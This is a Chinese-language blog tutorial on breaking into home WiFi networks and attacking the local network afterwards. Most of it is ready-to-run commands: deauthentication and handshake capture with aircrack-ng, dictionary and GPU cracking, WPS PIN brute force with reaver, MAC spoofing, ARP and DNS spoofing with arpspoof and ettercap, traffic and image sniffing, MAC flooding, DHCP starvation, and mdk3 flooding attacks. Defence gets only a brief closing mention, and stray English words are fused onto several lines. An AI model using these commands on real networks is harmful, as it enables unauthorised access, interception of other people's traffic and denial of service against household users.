本文主要講述 家庭家庭家庭中(重要的事情說三遍,企業認證服務器的wifi通常很是很是的安全破解不來)如何破解wifi密碼,破解wifi密碼後的內網滲透利用(簡單說明),如何設置wifi路由器更安全,從滲透的方面看wifi安全,根據需求選擇觀看php
須要支持監聽模式的無線網卡,通常電腦自帶的無線網卡是不支持監聽模式的,須要購買
內置kail驅動 RT3070 RTL8187(推薦使用)
我購買的連接以下,用着還行,監聽信號比手機強那麼一點點
https://m.tb.cn/h.VGGIItU?sm=0b7bf6html
由於wifi破解須要軟件支持,Windows下載麻煩,推薦kali(由於kali自帶不少工具)
由於用到kali,建議使用vmware虛擬機,不建議小白雙系統kali或者Microsoft Store中的kali
vmware下載查看:https://www.52pojie.cn/thread-1026907-1-1.html
注意:無線網卡監聽模式時若是出現vmware卡代碼,監聽時間長就中止的狀況建議更換上面這個文章的vmware版本
kali的vm鏡像下載,下載解壓,vmware打開便可使用,下載地址: https://images.offensive-security.com/virtual-images/kali-linux-2020.2a-vmware-amd64.7z?_ga=2.152625529.1921388440.1596879427-46569499.1595490768linux
Managed 模式:該模式用於你的無線客戶端直接與無線接入點(Access Point,即AP)進行接入鏈接。在這個模式中,咱們能夠進行無線接入internet上網,無線網卡的驅動程序依賴無線AP管理整個通訊過程。
Master 模式:一些無線網卡支持Master模式。這個模式容許無線網卡使用特製的驅動程序和軟件工做,做爲其餘設備的無線AP。它主要使用於無線接入點AP提供無線接入服務以及路由功能。好比無線路由器就是工做在Master模式下了,對於普通的pc機來講,若是有合適的硬件它也能夠變成一臺無線AP。
Ad hoc模式:當你的網絡由互相直連的設備組成時,就使用這個模式。在這個模式中,各設備之間採用對等網絡的方式進行鏈接,無線通訊雙方共同承擔無線AP的職責。
Monitor 模式:Monitor模式主要用於監控無線網絡內部的流量,用於檢查網絡和排錯。要使Wireshark捕獲無線數據包,你的無線網卡和配套驅動程序必須支持監聽模式(也叫RFMON模式)。git
參見:https://www.linuxidc.com/Linux/2016-09/135521p3.htmgithub
由於wep加密已經沒有使用的,很是不安全,就忽略了web
使用wifi萬能鑰匙,騰訊wifi管家等等,其原理就是wifi密碼共享,使用過該軟件會將你的鏈接過的wifi密碼共享出去,其自己不是破解而是共享制,鏈接後咱們就能夠看見密碼了,因此這種破解方法很是的好用,首先推薦算法
airmon-ng start wlan0 開啓監聽模式 airodump-ng wlan0mon 開始掃描附近wifi
airodump-ng wlan0mon參數:
-w 輸出文件
--ivs 只保存ivs,再也不保存全部無線數據,只是保存能夠用於破解的IVS數據報文
-c 指定信道
--bssid 指定路由的bssid也就是MAC地址
--essid 指定路由的essid,能夠理解爲wifi名稱(不許確)
airodump-ng wlan0mon 掃描參數
BSSID AP的MAC地址
PWR 信號強度接近0信號好
Beacons 無線ap的發送通告,告訴我是誰 週期發送
#Data 抓到的數據包
CH 信道
MB 最大傳輸速度
ENC 加密方法
CIPHER 加密算法
AUTH 認證協議
ESSID 通指wifi名字 <length: >表示未廣播
STATION 客戶端
RATE 傳輸速率
Lost 最近10秒的丟包數
Frames 來自客戶端的數據
Probes 主動彈出 若是客戶端正試圖鏈接一個AP但沒有連上,會顯示這裏
Aircrack-ng工具包數據庫
指定監聽的wifi
airodump-ng -w [文件] --bssid [wifibssid] -c [信道最好指定] wlan0mon
管理針攻擊將其餘用戶踢下線
aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION] wlan0mon
管理針攻擊得到握手包
若是出現錯誤可嘗試
--ignore-negative-one 忽略-1信道
根據握手包暴力破解密碼
aircrack-ng -w [密碼字典] [握手包.cap]
根據握手包破解密碼加速
這裏推薦使用windows下GPU加速工具EWSA,還有其餘加速方式不過我不怎麼推薦,也能夠找專業的跑包團隊來跑包
EWSA下載和使用說明地址:https://www.52pojie.cn/thread-989800-1-1.html
找跑包地址:https://www.anywlan.com/forum-134-1.htmlwindows
8位ping碼,第8位數是校驗碼,只須要破解七位,ping碼分前部分(4位)後部分(3位),pin認證鏈接失敗,路由器返回EAP-NACK信息,經過迴應,可以肯定pin的前部分或後部分是否正確,因此可能性是11000(104+103),不過考慮信號和路由器的處理性能網卡功率等可能時間會長,若是信號好,網卡,路由器也比較好通常須要6個小時左右
查看開啓wps的wifi安全
wash -i wlan0mon
reaver -I wlan0mon -b [BSSID] -vv 還能夠加其餘參數 進行爆破
原理:就是上面的命令只不過是自動化了
使用:cmd輸入wifite進入掃描
以爲掃描好了ctrl+c就好,按照序號選擇要破解的wifi便可,根據wifi開啓了啥會進行自動的破解,若是想跳過某個破解方式按ctrl+c便可,若是獲取到握手包自帶的密碼字典沒跑出來,能夠去上面提醒的路徑找握手包,用本身的字典跑
掃描查看已鏈接的客戶機的mac地址將網卡的mac地址改成其便可
先down掉網卡
ifconfig wlan0 down
修改mac地址
macchanger wlan0 -m [須要修改的mac地址,有些網卡可能不支持修改]
啓動網卡
ifconfig wlan0 up
1.等待其餘用戶鏈接,會先詢問ssid
airodump-ng wlan0mon 就能看見
2.將別人踢下線,讓其重連,和抓起握手包同樣,注意信道
aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION]
查看內網的主機
nmap -sP 192.168.1.0/24 -v
開啓轉發模式
echo 1 > /proc/sys/net/ipv4/ip_forward
雙向欺騙分別是目標主機ip和網關
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1
啓動wireshare查看ip.src == 192.168.1.106,發現欺騙成功能夠攔截他的訪問
driftnet -i eth0 監聽圖片
原理:進行arp欺騙但不進行轉發
echo 0 > /proc/sys/net/ipv4/ip_forward
雙向欺騙
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.106
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1
目標主機window7 ip地址 192.168.124.128
攻擊機kali ip地址 192.168.124.139
劫持到web服務window10(phpstudy) ip地址 192.168.1.104
修改配置文件nano /etc/ettercap/etter.dns
ettercap -Tq -i eth0 -P dns_spoof /// ///
進行欺騙-i後是無線網卡 ///中加目標主機和網卡,不加就是所有,發現window7被劫持成功,若是安裝殺毒軟件可能劫持不了
如何恢復
ipconfig/flushdns刷新便可
交換機中有mac地址表記錄鏈接的pc,攻擊者不斷刷新mac地址來填滿交換機的mac地址表,交換機在mac地址表找不到該用戶只能經過廣播的形式發送,攻擊者就能夠截獲數據
交換機設置靜態mac地址綁定可預防,非表內請求將所有丟棄
macof -i eth0
路由器分配ip,攻擊者發送大量discover包來獲取ip讓其者無ip使用,沒法鏈接
先安裝
apt-get install yersinia
啓動
yersinia -G
如下利用前提無線網卡要開啓監聽模式
工具mdk3 mdk3可查看使用說明
mdk3 wlan0mon b -n SSID (-f 能夠導入列表建立多個ssidwifi,不指定則隨機) -c [信道] -w -g -s 100
僞造大量的client去鏈接ap,可致使正在已鏈接用戶無反應 -a後加交換機ssid
mdk3 wlan0mon a -a FC:D7:33:DE:F3:8A -c -s 300
就是以前抓握手包同樣將別人踢下線
aireplay-ng -0 5 -a [路由bssid] -c [客戶端STATION] wlan0mon
用mdk3針對全網,在攻擊中踢掉線後也沒法鏈接成功
mdk3 wlan0mon d
可-b 加文件指定mac地址攻擊
攻與防護自己就是一場博弈根據上面的攻擊方式咱們能夠設置路由器是wifi更安全尤爲是物聯網的發展,家裏的不少東西都要鏈接網絡
b站:https://www.bilibili.com/video/BV1e7411o7GB?p=1
b站:https://www.bilibili.com/video/BV14z4y1Q7Nb?from=search&seid=10037556429710890008
論壇:https://www.anywlan.com/
等等等不少前輩的文章,無法都列舉(找不到了),表示抱歉和感謝
最後歡迎訪問個人我的博客:https://lmg66.github.io/ 說明:本文僅限技術研究與討論,嚴禁用於非法用途,不然產生的一切後果自行承擔